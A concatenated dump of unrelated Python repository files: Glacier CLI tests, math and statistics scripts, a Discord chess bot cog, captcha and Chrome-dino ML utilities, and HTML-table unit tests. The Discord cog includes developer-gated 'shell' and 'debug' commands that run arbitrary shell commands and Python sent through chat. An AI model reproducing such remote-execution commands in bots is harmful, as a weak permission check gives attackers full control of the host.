def fetch(self, indentation=' ', message=False, stack=False):
"""
Fetches the error details and returns them as string.
"""
out = ''
for line in self.causeTree(indentation, message=message, stack=stack):
out += line
return out
class InputException(GlacierException):
"""
Exception that is raised when there is someting wrong with the
user input.
"""
VaultNameError = 1
VaultDescriptionError = 2
def __init__(self, message, code=None, cause=None):
""" Handles the exception.
:param message: the error message.
:type message: str
:param code: the error code.
:type code:
:param cause: explanation on what caused the error.
:type cause: str
"""
GlacierException.__init__(self, message, code=code, cause=cause)
class ConnectionException(GlacierException):
"""
Exception that is raised when there is something wrong with
the connection.
"""
GlacierConnectionError = 1
SdbConnectionError = 2
def __init__(self, message, code=None, cause=None):
""" Handles the exception.
:param message: the error message.
:type message: str
:param code: the error code.
:type code:
:param cause: explanation on what caused the error.
:type cause: str
"""
GlacierException.__init__(self, message, code=code, cause=cause)
class CommunicationException(GlacierException):
"""
Exception that is raised when there is something wrong in
the communication with an external library like boto.
"""
def __init__(self, message, code=None, cause=None):
""" Handles the exception.
:param message: the error message.
:type message: str
:param code: the error code.
:type code:
:param cause: explanation on what caused the error.
:type cause: str
"""
GlacierException.__init__(self, message, code=code, cause=cause)
class ResponseException(GlacierException):
"""
Exception that is raised when there is an http response error.
"""
def __init__(self, message, code=None, cause=None):
GlacierException.__init__(self, message, code=code, cause=cause)
if __name__ == '__main__':
class ChildrenException(Exception):
def __init__(self, message):
Exception.__init__(self, message)
class ParentException(GlacierException):
def __init__(self, message, cause=None):
if cause:
GlacierException.__init__(self, message, cause=cause)
else:
GlacierException.__init__(self, message)
try:
try:
raise ChildrenException("parent")
except ChildrenException, e:
raise ParentException("children", cause=e)
except ParentException, e:
e.write(indentation='|| ')
```
#### File: glacier/tests/sns.py
```python
import unittest
import ConfigParser
import os
import sys
sys.path.append("/".join(sys.path[0].split("/")[:-1]))
from GlacierWrapper import GlacierWrapper
from boto.glacier.exceptions import UnexpectedHTTPResponseError
import localsettings
class TestGlacierSNS(unittest.TestCase):
def setUp(self):
config = ConfigParser.SafeConfigParser()
config.read(['/etc/glacier-cmd.conf',
os.path.expanduser('~/.glacier-cmd')])
secs = config.sections()
for sec in secs:
if sec != "aws":
config.remove_section(sec)
prepand_options = lambda section: [(section + "_" + k, v)
for k, v in config.items(section)]
self.args = dict(prepand_options("aws"))
self.args.update({"region": "us-east-1"})
def tearDown(self):
for vault in self.gw.lsvault():
if \
vault[u'VaultARN'].split("vaults/")[-1]\
.startswith("test_vvault"):
self.gw.rmvault(vault[u'VaultARN'].split("vaults/")[-1])
topics = self.gw.sns_conn.get_all_topics()\
['ListTopicsResponse']\
['ListTopicsResult']\
['Topics']
for topic in topics:
if topic['TopicArn'].split(":")[-1].startswith("test_topic"):
self.gw.sns_conn.delete_topic(topic['TopicArn'])
class TestGlacierSNSAuto(TestGlacierSNS):
def test_sync_auto_basic(self):
"""
No configuration
"""
sns_options = {'topic': 'aws-glacier-notifications',
'topics_present': False}
self.gw = GlacierWrapper(**self.args)
vault_name = "test_vvault0"
# Lets create one vault for our testing purposes
self.gw.mkvault(vault_name)
# Only after a call to one of gw functions was executed
# is glacierconn available
gc = vars(self.gw)['glacierconn']
# No vault notifications set for fresh vault
with self.assertRaises(UnexpectedHTTPResponseError) as cm:
gc.get_vault_notifications(vault_name)
self.assertEqual(cm.exception.status, 404)
self.assertEqual(cm.exception.message,
("Expected 200, got (404, "
"code=ResourceNotFoundException, "
"message=No notification configuration "
"is set for vault: %s)") % (vault_name,))
# Set all vaults
response = self.gw.sns_sync(sns_options=sns_options, output="csv")
successful_vaults = [r["Vault Name"] for r in response]
self.assertIn(vault_name, successful_vaults)
# Check out vault has set notifications
vaults = [vault[u'VaultARN'].split("vaults/")[-1]
for vault in self.gw.lsvault()]
for vault in vaults:
response = gc.get_vault_notifications(vault)
events = response['Events']
self.assertIn(u"ArchiveRetrievalCompleted", events)
self.assertIn(u"InventoryRetrievalCompleted", events)
# Remove test vault
self.gw.rmvault(vault_name)
class TestGlacierSNSMultiConfig(TestGlacierSNS):
def test_withOUT_method(self):
"""
Configuration
[SNS:test_topic_1]
[SNS:test_topic_2]
vaults=test_vvault0,test_vvault2
{'topics': [
"""
vaults = ['test_vvault0', 'test_vvault1', 'test_vvault2']
vaults_used = [vaults[0], vaults[2]]
sns_options = {'topics': [
{'topic': 'test_topic_1', 'options':{}},
{'topic': 'test_topic_2', 'options':
{'vaults': ','.join(vaults_used)}}
],
'topics_present': True}
self.gw = GlacierWrapper(**self.args)
for vault in vaults:
self.gw.mkvault(vault)
response = self.gw.sns_sync(sns_options=sns_options, output="csv")
for obj in response:
del obj['Request Id']
# Testing topic 1 - no vaults passed in,
# should be subscribed to all vaults (our testing vaults and some more)
for vault in vaults:
self.assertIn(
dict([('Topic', 'test_topic_1'),
('Subscribe Result', u''),
('Vault Name', vault)]),
response)
# Testing topic 2
# should be subscribed only to test_vvault0, test_vvault2
for vault in vaults_used:
self.assertIn(
dict([('Topic', 'test_topic_2'),
('Subscribe Result', u''),
('Vault Name', vault)]),
response)
for vault in vaults:
self.gw.rmvault(vault)
def test_with_method(self):
"""
Configuration
[SNS:test_topic_1]
method=email,<EMAIL>;
[SNS:test_topic_2]
vaults=test_vvault0,test_vvault2
method=email,<EMAIL>;email,<EMAIL>
"""
vaults = ['test_vvault0', 'test_vvault1', 'test_vvault2']
vaults_used = [vaults[0], vaults[2]]
sns_options = {'topics': [
{'topic': 'test_topic_1', 'options':
{'method': '%s,%s;' % (
localsettings.protocol_1,
localsettings.endpoint_1
)}},
{'topic': 'test_topic_2', 'options':
{'vaults': 'test_vvault0,test_vvault2',
'method': ('%s,%s;'
'%s,%s') % (
localsettings.protocol_1,
localsettings.endpoint_1,
localsettings.protocol_2,
localsettings.endpoint_2)}}
],
'topics_present': True}
self.gw = GlacierWrapper(**self.args)
for vault in vaults:
self.gw.mkvault(vault)
response = self.gw.sns_sync(sns_options=sns_options, output="csv")
for obj in response:
del obj['Request Id']
# Testing topic 1 - no vaults passed in,
# should be subscribed to all vaults (our testing vaults and some more)
for vault in vaults:
self.assertIn(
dict([('Topic', 'test_topic_1'),
('Subscribe Result', u'pending confirmation'),
('Vault Name', vault)]),
response)
# Testing topic 2
# should be subscribed only to test_vvault0, test_vvault2
for vault in vaults_used:
self.assertIn(
dict([('Topic', 'test_topic_2'),
('Subscribe Result', u'pending confirmation'),
('Vault Name', vault)]),
response)
for vault in vaults:
self.gw.rmvault(vault)
class TestGlacierSNSManualSubscribe(TestGlacierSNS):
def test_subscribe_to_existing_topic(self):
"""
$ glacier-cmd subscribe email endpoint_1 test_topic_1
"""
self.gw = GlacierWrapper(**self.args)
topic = 'test_topic_existing_kind_off'
# sns_subscribe actually creates a topic to "get it"
response = self.gw.sns_subscribe(protocol="email",
endpoint=localsettings.endpoint_1,
topic=topic,
sns_options={})
for res in response:
del res["RequestId"]
self.assertIn(
{'SubscribeResult': u'pending confirmation'},
response)
all_topics = self.gw.sns_conn.get_all_topics()\
['ListTopicsResponse']\
['ListTopicsResult']\
['Topics']
topics = [t['TopicArn'].split(":")[-1] for t in all_topics]
self.assertIn(topic, topics)
def test_subscribe_create_topic_for_vaults(self):
"""
$ glacier-cmd
subscribe email endpoint_1 test_topic --vault test_vvault0,test_vvault
"""
self.gw = GlacierWrapper(**self.args)
vaults = ['test_vvault0', 'test_vvault1', 'test_vvault2']
vaults_used = [vaults[0], vaults[2]]
topic = 'test_topic_new_for_vaults'
for vault in vaults:
self.gw.mkvault(vault)
response = self.gw.sns_subscribe(protocol="email",
endpoint=localsettings.endpoint_1,
topic=topic,
vault_names=",".join(vaults_used),
sns_options={})
for res in response:
del res["RequestId"]
self.assertIn(
{'SubscribeResult': u'pending confirmation'},
response)
# Lets check that the topic was created
all_topics = self.gw.sns_conn.get_all_topics()\
['ListTopicsResponse']\
['ListTopicsResult']\
['Topics']
topics = [t['TopicArn'].split(":")[-1] for t in all_topics]
self.assertIn(topic, topics)
for vault in vaults_used:
notifications = self.gw.glacierconn.get_vault_notifications(vault)
self.assertIn("ArchiveRetrievalCompleted",
notifications['Events'])
self.assertIn("InventoryRetrievalCompleted",
notifications['Events'])
self.assertEqual(topic,
notifications['SNSTopic'].split(":")[-1])
if __name__ == '__main__':
# Use python -m unittest tests_sns.<test case> to run individual test cases
# e. g. python -m unittest tests_sns.TestGlacierSNSManualSubscribe
unittest.main()
```
|
{
"source": "Jeff-Andrade/math-experiments",
"score": 4
}
|
#### File: math-experiments/Mathematics/Combinations.py
```python
from math import factorial
from random import choice
# Stores all valid permutations of the given data. Valid permutations are those not present in this list
globalPermutations = []
def sampler(data):
# Stores the permutation generated by one iteration of the sampler function if it is valid permutation
localPermutation = []
# Creates a copy of the input data, which will be altered through the execution of the function
sampleData = data[:]
# Makes sure that the function will generate a permutation of the same size of the original input data
while len(localPermutation) < len(data):
# Chooses a random element from the copy of the data
sampledElement = choice(sampleData)
# When an element is chosen, it will be removed from the copy, ensuring that a new element is always picked
sampleData.remove(sampledElement)
# Adds the chosen element to the local permutation list
localPermutation.append(sampledElement)
if localPermutation in globalPermutations:
continue # If the desired number of elements has been reached but the newly generated permutation has already been previously generated, the process will start over again
# After a valid permutation has been generated, it is added to the global permutation list
globalPermutations.append(localPermutation)
print(localPermutation)
def combinations(data):
# The sampler function will be executed according to the factorial of the number of possible permutations of a list
for i in range(factorial(len(data))):
sampler(data)
```
#### File: Statistics/Frequency Table/Frequency Table.py
```python
import pandas as pd
import math
class FrequencyTable:
def __init__(self, data, include_stats):
def generate_table_info(data):
classAmount = round(1 + 3.3 * math.log(len(data), 10))
classAmplitude = (max(data) - min(data))/classAmount
minValue = min(data)
maxValue = max(data)
return [classAmount, classAmplitude, minValue, maxValue]
self.data = data
self.include_stats = include_stats
self.info = generate_table_info(self.data)
self.classAmount = self.info[0]
self.classAmplitude = self.info[1]
self.minValue = self.info[2]
self.maxValue = self.info[3]
self.classLines = []
def generate_interval(self):
currentValue = self.minValue
for intervals in range(self.classAmount):
self.classLines.append(
[currentValue, currentValue + self.classAmplitude, 0, 0])
currentValue += self.classAmplitude
def generate_frequencies(self):
for numbers in range(len(self.data)):
for intervals in range(len(self.classLines)):
if self.data[numbers] >= self.classLines[intervals][0] and self.data[numbers] < self.classLines[intervals][1]:
self.classLines[intervals][2] += 1
elif self.data[numbers] == self.maxValue and self.data[numbers] == self.classLines[intervals][1]:
self.classLines[intervals][2] += 1
for intervals in range(len(self.classLines)):
self.classLines[intervals][3] = (
round(self.classLines[intervals][2]/len(self.data), 3))*100
def generate_stats(self):
def calculate_mean():
mean = round(sum(self.data)/len(self.data), 3)
return mean
def calculate_median():
self.data.sort()
if len(self.data) % 2 == 0:
median = (self.data[len(self.data)//2] +
self.data[(len(self.data)//2) - 1])/2
else:
median = self.data[((len(self.data)-1)//2) + 1]
return median
def calculate_stdev():
summation = 0
for samples in range(len(self.data)):
summation += (self.data[samples] - calculate_mean())**2
result = round(math.sqrt((summation/(len(self.data) - 1))), 3)
return result
return [calculate_mean(), calculate_median(), calculate_stdev()]
def get_output(self):
def get_table():
dfFrequency = pd.DataFrame(data=self.classLines)
dfFrequency[0] = dfFrequency[0].round(3)
dfFrequency[1] = dfFrequency[1].round(3)
dfFrequency.columns = ["Lower Bound", "Upper Bound",
"Absolute Frequency", "Relative Frequency (%)"]
dfFrequency.index = range(1, len(dfFrequency.index) + 1)
return dfFrequency
def get_stats_table():
dfStats = pd.DataFrame(data=self.generate_stats())
dfStats = dfStats.transpose()
dfStats[0] = dfStats[0].round(3)
dfStats[1] = dfStats[1].round(3)
dfStats[2] = dfStats[2].round(3)
dfStats.columns = ["Mean", "Median",
"Standard Deviation"]
dfStats.index = [1]
return dfStats
if self.include_stats == True:
return [get_table(), get_stats_table()]
else:
return [get_table()]
def run(self):
if len(self.classLines) == 0:
self.generate_interval()
self.generate_frequencies()
return self.get_output()
else:
return self.get_output()
```
|
{
"source": "jeffarjeffar/Chess_Bot",
"score": 2
}
|
#### File: Chess_Bot/cogs/Development.py
```python
import discord
from discord.ext import commands
import os
import sys
import time
import pickle
import typing
import io
import textwrap
import traceback
from contextlib import redirect_stdout
import Chess_Bot.util.Utility as util
from Chess_Bot.util.CPP_IO import *
def is_developer():
def predicate(ctx):
return ctx.message.author.id in constants.DEVELOPERS
return commands.check(predicate)
class Development(commands.Cog):
def __init__(self, client):
self.client = client
self._last_result = None
@commands.command(hidden=True)
@commands.cooldown(1, 15, commands.BucketType.user)
@is_developer()
async def update(self, ctx):
await util.run('make clear')
out, err, status = await util.run('make')
message = f'Updated\nCompile Message: {out}\nStderr: {err}'
if len(message) >= 2000:
f = open(os.path.join(constants.TEMP_DIR, 'message.txt'), 'w')
f.write(message)
f.close()
await ctx.send(file=discord.File(os.path.join(constants.TEMP_DIR, 'message.txt')))
else:
await ctx.send(message)
await ctx.send(status)
@commands.command(hidden=True)
@is_developer()
async def shell(self, ctx, *, cmd):
await ctx.send(f'Executing command "{cmd}"...')
stdout, stderr, status = await util.run(cmd)
message = f'Stdout: {stdout}\nStderr: {stderr}'
if len(message) >= 2000:
f = open(os.path.join(constants.TEMP_DIR, 'message.txt'), 'w')
f.write(message)
f.close()
await ctx.send(file=discord.File(os.path.join(constants.TEMP_DIR, 'message.txt')))
else:
await ctx.send(message)
await ctx.send(status)
@commands.command(hidden=True)
@commands.cooldown(1, 15, commands.BucketType.user)
@is_developer()
async def restart(self, ctx):
await ctx.send(f'Restarting...')
sys.exit()
@commands.command(hidden=True)
@is_developer()
async def git_pull(self, ctx):
await ctx.send(f'Executing command "git pull"...')
stdout, stderr, status = await util.run(f'git pull')
message = f'```\nStdout:\n{stdout}Stderr: {stderr}```'
if len(message) >= 2000:
f = open(os.path.join(constants.TEMP_DIR, 'message.txt'), 'w')
f.write(message)
f.close()
await ctx.send(file=discord.File(os.path.join(constants.TEMP_DIR, 'message.txt')))
else:
await ctx.send(message)
await ctx.send(status)
def cleanup_code(self, content):
"""Automatically removes code blocks from the code."""
# remove ```py\n```
if content.startswith('```') and content.endswith('```'):
return '\n'.join(content.split('\n')[1:-1])
# remove `foo`
return content.strip('` \n')
@commands.command(pass_context=True, hidden=True)
@is_developer()
async def debug(self, ctx, *, body: str):
"""Evaluates a code"""
env = {
'bot': self.client,
'ctx': ctx,
'channel': ctx.channel,
'author': ctx.author,
'guild': ctx.guild,
'message': ctx.message,
'_': self._last_result
}
env.update(globals())
body = self.cleanup_code(body)
stdout = io.StringIO()
to_compile = f'async def func():\n{textwrap.indent(body, " ")}'
try:
exec(to_compile, env)
except Exception as e:
return await ctx.send(f'```py\n{e.__class__.__name__}: {e}\n```')
func = env['func']
try:
with redirect_stdout(stdout):
ret = await func()
except Exception as e:
value = stdout.getvalue()
await ctx.send(f'```py\n{value}{traceback.format_exc()}\n```')
else:
value = stdout.getvalue()
try:
await ctx.message.add_reaction('\u2705')
except:
pass
if ret is None:
if value:
await ctx.send(f'```py\n{value}\n```')
else:
self._last_result = ret
await ctx.send(f'```py\n{value}{ret}\n```')
@commands.command(hidden=True)
@is_developer()
async def gimme(self, ctx, file):
await ctx.send(file, file=discord.File(file))
def setup(bot):
bot.add_cog(Development(bot))
```
|
{
"source": "jeffasante/captcha",
"score": 3
}
|
#### File: jeffasante/captcha/utils.py
```python
from torchvision import transforms, datasets
import numpy as np
import zipfile
from io import open
import glob
from PIL import Image, ImageOps
import os
import string
# Read data
def extractZipFiles(zip_file, extract_to):
''' Extract from zip '''
with zipfile.ZipFile(zip_file, 'r')as zipped_ref:
zipped_ref.extractall(extract_to)
print('done')
data_dir = 'data/captcha_images_v2/*.png'
def findFiles(path): return glob.glob(path)
# find letter inde from targets_flat
def letterToIndex(letter):
return all_letters.find(letter)
# print(letterToIndex('l'))
# index to letter
indexToLetter = {letterToIndex(i):i for i in all_letters}
data = [img for img in findFiles(data_dir)]
targets = [os.path.basename(x)[:-4] for x in glob.glob(data_dir)]
# abcde -> [a, b, c, d, e]
pre_targets_flat = [[c for c in x] for x in targets]
encoded_targets = np.array([[letterToIndex(c) for c in x] for x in pre_targets_flat])
targets_flat = [char for word in pre_targets_flat for char in word]
unique_letters = set(char for word in targets for char in word)
class CaptchaDataset(Dataset):
"""
Args:
data (string): Path to the file with all the images.
target (string): Path to the file with annotations.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
def __init__(self, data, target=None, transform=None):
self.data = data
self.target = target
self.transform = transform
def __getitem__(self, index):
# read image
x = Image.open(self.data[index]).convert('RGB')
y = self.target[index]
# resize, turn to 0,1
if self.transform:
x = self.transform(x)
return x, torch.tensor(y, dtype=torch.long)
return x, y
def __len__(self):
return len(self.data)
```
|
{
"source": "jeffasante/chrome-dino-RL",
"score": 3
}
|
#### File: chrome-dino-RL/utils/extract.py
```python
import torchvision.transforms as T
import torch
from PIL import Image
import numpy as np
'''Input Extraction'''
def get_dino_location(screen_height, screen_width):
world = screen_height * screen_width
scale = screen_width / world
return int(screen_height * scale + screen_width / 2.0)
resize = T.Compose([T.ToPILImage(),
T.Resize((80,80,), interpolation=Image.CUBIC),
T.ToTensor()])
def get_screen(env):
screen = env.render(mode='rgb_array').transpose((2, 0, 1))
_, screen_height, screen_width = screen.shape
# strip of the top and bottom
screen = screen[:, int(screen_height*0.2):int(screen_height*0.5), :]
dino_loc = get_dino_location(screen_height, screen_width)
screen = screen[:, :dino_loc, :]
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255.0
screen = torch.from_numpy(screen)
return resize(screen).unsqueeze(0)
```
#### File: chrome-dino-RL/utils/gym_dino_run.py
```python
import gym
from gym import spaces, error
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from pyvirtualdisplay import Display
import numpy as np
import os
import time
from io import BytesIO
from PIL import Image
import base64
import cv2
class GameInterface:
def __init__(self, game_url='chrome://dino',
chromedrive='./utils/chrome_driver/chromedriver.exe'):
'''Web Interface.'''
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--mute-audio')
self.driver = webdriver.Chrome(chromedrive,
chrome_options=chrome_options)
self.driver.set_window_position(x=-10, y=0)
try:
self.driver.get(game_url)
except:
print('Running offline..')
def press_up(self):
self.driver.find_element_by_tag_name("body").send_keys(Keys.ARROW_UP)
def press_down(self):
self.driver.find_element_by_tag_name("body").send_keys(Keys.ARROW_DOWN)
def press_space(self):
self.driver.find_element_by_tag_name("body").send_keys(Keys.SPACE)
def get_crashed(self):
return self.driver.execute_script("return Runner.instance_.crashed")
def pause(self):
return self.driver.execute_script("return Runner.instance_.stop()")
def resume(self):
return self.driver.execute_script("return Runner.instance_.play()")
def end(self):
self.driver.close()
class DinoRunEnv(gym.Env, GameInterface):
def __init__(self, screen_width=120, screen_height=120, headless=False):
gym.Env.__init__(self)
GameInterface.__init__(self, game_url='chrome://dino')
self.screen_width = screen_width
self.screen_height = screen_height
self.driver.execute_script("Runner.config.ACCELERATION=0")
init_script = "document.getElementsByClassName('runner-canvas')[0].id = 'runner-canvas'"
self.driver.execute_script(init_script)
# action_space and observation_space
self.action_space = spaces.Discrete(3) # do nothing, up, down
self.observation_space = spaces.Box(
low = 0,
high = 255,
shape = (self.screen_width, self.screen_height, 3),
dtype=np.uint8
)
self.viewer = None
self.actions_lookup = {0:lambda: None,
1:self.press_up,
2:self.press_down
}
# All graphical operations are performed in virtual memory without showing any screen output.
if headless:
display = Display(visible=0, size=(1024, 768))
display.start()
def step(self, action):
'''returns observaton, reward, done, extra_info'''
assert action in self.action_space
self.actions_lookup[action]()
obs = self._get_screen()
done, reward = (True, -1) if self._get_crashed() else (False, 0.1)
time.sleep(.015)
return obs, reward, done, {'score': self._get_score()}
def render(self, mode='human'):
''' Return image array '''
image = cv2.cvtColor(self._get_screen(), cv2.COLOR_BGR2RGB)
if mode == 'rgb_array':
return image
elif mode =='human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(image)
return self.viewer.isopen
def reset(self):
self.driver.execute_script("Runner.instance_.restart()")
self.step(1)
time.sleep(2)
return self._get_screen()
def close(self):
if self.viewer is not None:
self.viewer.close()
self.viewer = None
def _get_screen(self):
image = self.driver.get_screenshot_as_base64()
return np.array(Image.open(BytesIO(base64.b64decode(image))))
def _get_score(self):
return int(''.join \
(self.driver.execute_script("return Runner.instance_.distanceMeter.digits")))
def _get_crashed(self):
return self.driver.execute_script("return Runner.instance_.crashed")
```
|
{
"source": "jeffa/Spreadsheet-HTML-python",
"score": 3
}
|
#### File: Spreadsheet-HTML-python/t/06-aliases.py
```python
import unittest
from Spreadsheet.HTML import Table
class TestAliases(unittest.TestCase):
def test_portrait(self):
data = [
['header1', 'header2', 'header3', 'header4'],
['foo1', 'bar1', 'baz1', 'qux1'],
['foo2', 'bar2', 'baz2', 'qux2'],
['foo3', 'bar3', 'baz3', 'qux3'],
['foo4', 'bar4', 'baz4', 'qux4']
]
html = '<table><tr><th>header1</th><th>header2</th><th>header3</th><th>header4</th></tr><tr><td>foo1</td><td>bar1</td><td>baz1</td><td>qux1</td></tr><tr><td>foo2</td><td>bar2</td><td>baz2</td><td>qux2</td></tr><tr><td>foo3</td><td>bar3</td><td>baz3</td><td>qux3</td></tr><tr><td>foo4</td><td>bar4</td><td>baz4</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data } ).portrait(),
"via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data ),
"with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data } ),
"named args only"
)
self.assertEqual(
html,
Table( { 'data': data, 'theta': 90 } ).portrait(),
"theta disabled via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data, 'theta', 180 ),
"theta disabled with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data, 'theta': 270 } ),
"theta disabled named args only"
)
html = '<table><tr><td>header1</td><td>header2</td><td>header3</td><td>header4</td></tr><tr><td>foo1</td><td>bar1</td><td>baz1</td><td>qux1</td></tr><tr><td>foo2</td><td>bar2</td><td>baz2</td><td>qux2</td></tr><tr><td>foo3</td><td>bar3</td><td>baz3</td><td>qux3</td></tr><tr><td>foo4</td><td>bar4</td><td>baz4</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'matrix': 1 } ).portrait(),
"matrix via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data, 'matrix', 1 ),
"matrix with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data, 'matrix': 1 } ),
"matrix named args only"
)
html = '<table><tr><td>foo1</td><td>bar1</td><td>baz1</td><td>qux1</td></tr><tr><td>foo2</td><td>bar2</td><td>baz2</td><td>qux2</td></tr><tr><td>foo3</td><td>bar3</td><td>baz3</td><td>qux3</td></tr><tr><td>foo4</td><td>bar4</td><td>baz4</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'headless': 1 } ).portrait(),
"headless via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data, 'headless', 1 ),
"headless with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data, 'headless': 1 } ),
"headless named args only"
)
def test_landscape(self):
data = [
['header1', 'header2', 'header3', 'header4'],
['foo1', 'bar1', 'baz1', 'qux1'],
['foo2', 'bar2', 'baz2', 'qux2'],
['foo3', 'bar3', 'baz3', 'qux3'],
['foo4', 'bar4', 'baz4', 'qux4']
]
html = '<table><tr><th>header1</th><td>foo1</td><td>foo2</td><td>foo3</td><td>foo4</td></tr><tr><th>header2</th><td>bar1</td><td>bar2</td><td>bar3</td><td>bar4</td></tr><tr><th>header3</th><td>baz1</td><td>baz2</td><td>baz3</td><td>baz4</td></tr><tr><th>header4</th><td>qux1</td><td>qux2</td><td>qux3</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data } ).landscape(),
"via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data ),
"with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data } ),
"named args only"
)
self.assertEqual(
html,
Table( { 'data': data, 'theta': 90 } ).landscape(),
"theta disabled via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data, 'theta', 180 ),
"theta disabled with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data, 'theta': 270 } ),
"theta disabled named args only"
)
html = '<table><tr><td>header1</td><td>foo1</td><td>foo2</td><td>foo3</td><td>foo4</td></tr><tr><td>header2</td><td>bar1</td><td>bar2</td><td>bar3</td><td>bar4</td></tr><tr><td>header3</td><td>baz1</td><td>baz2</td><td>baz3</td><td>baz4</td></tr><tr><td>header4</td><td>qux1</td><td>qux2</td><td>qux3</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'matrix': 1 } ).landscape(),
"matrix via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data, 'matrix', 1 ),
"matrix with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data, 'matrix': 1 } ),
"matrix named args only"
)
html = '<table><tr><td>foo1</td><td>foo2</td><td>foo3</td><td>foo4</td></tr><tr><td>bar1</td><td>bar2</td><td>bar3</td><td>bar4</td></tr><tr><td>baz1</td><td>baz2</td><td>baz3</td><td>baz4</td></tr><tr><td>qux1</td><td>qux2</td><td>qux3</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'headless': 1 } ).landscape(),
"headless via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data, 'headless', 1 ),
"headless with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data, 'headless': 1 } ),
"headless named args only"
)
def test_aliases(self):
data = [
['header1', 'header2', 'header3', 'header4'],
['foo1', 'bar1', 'baz1', 'qux1'],
['foo2', 'bar2', 'baz2', 'qux2'],
['foo3', 'bar3', 'baz3', 'qux3'],
['foo4', 'bar4', 'baz4', 'qux4']
]
self.assertEqual(
Table( { 'data': data } ).generate(),
Table( { 'data': data } ).portrait(),
"portrait is generate via constructor and method"
)
self.assertEqual(
Table().generate( data ),
Table().portrait( data ),
"portrait is generate with array ref"
)
self.assertEqual(
Table().generate( { 'data': data } ),
Table().portrait( { 'data': data } ),
"portrait is generate named args only"
)
self.assertEqual(
Table( { 'data': data } ).generate(),
Table( { 'data': data } ).north(),
"north is generate via constructor and method"
)
self.assertEqual(
Table().generate( data ),
Table().north( data ),
"north is generate with array ref"
)
self.assertEqual(
Table().generate( { 'data': data } ),
Table().north( { 'data': data } ),
"north is generate named args only"
)
self.assertEqual(
Table( { 'data': data } ).west(),
Table( { 'data': data } ).landscape(),
"west is landscape via constructor and method"
)
self.assertEqual(
Table().west( data ),
Table().landscape( data ),
"west is landscape with array ref"
)
self.assertEqual(
Table().west( { 'data': data } ),
Table().landscape( { 'data': data } ),
"west is landscape named args only"
)
self.assertEqual(
Table( { 'data': data } ).west(),
Table( { 'data': data, 'theta': -270 } ).generate(),
"west is theta -270 via constructor and method"
)
self.assertEqual(
Table().west( data ),
Table().generate( data, 'theta', -270 ),
"west is theta -270 with array ref"
)
self.assertEqual(
Table().west( { 'data': data } ),
Table().generate( { 'data': data, 'theta': -270 } ),
"west is theta -270 named args only"
)
self.assertEqual(
Table( { 'data': data } ).east(),
Table( { 'data': data, 'theta': 90, 'pinhead': 1 } ).generate(),
"east is theta 90 via constructor and method"
)
self.assertEqual(
Table().east( data ),
Table().generate( data, 'theta', 90, 'pinhead', 1 ),
"east is theta 90 with array ref"
)
self.assertEqual(
Table().east( { 'data': data } ),
Table().generate( { 'data': data, 'theta': 90, 'pinhead': 1 } ),
"east is theta 90 named args only"
)
self.assertEqual(
Table( { 'data': data } ).south(),
Table( { 'data': data, 'theta': -180, 'pinhead': 1 } ).generate(),
"south is theta -180 via constructor and method"
)
self.assertEqual(
Table().south( data ),
Table().generate( data, 'theta', -180, 'pinhead', 1 ),
"south is theta -180 with array ref"
)
self.assertEqual(
Table().south( { 'data': data } ),
Table().generate( { 'data': data, 'theta': -180, 'pinhead': 1 } ),
"south is theta -180 named args only"
)
if __name__ == '__main__':
unittest.main()
```
#### File: Spreadsheet-HTML-python/t/12-encodes.py
```python
import unittest
from Spreadsheet.HTML import Table
class TestEncodes(unittest.TestCase):
def test_encodes(self):
data = [
[ 'header1', 'header2', 'header3' ],
[ '<foo1>', '&bar1', '"baz1' ],
[ '<foo2>', '&bar2', '"baz2' ],
[ '', '0', '' ],
]
gen = Table( { 'data': data } )
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate(),
"nothing encoded by default"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encode': 1 } ),
"default encoding works"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encodes': '&' } ),
"only requested char is encoded"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encodes': '0' } ),
"zero as requested char is encoded"
)
self.assertEqual(
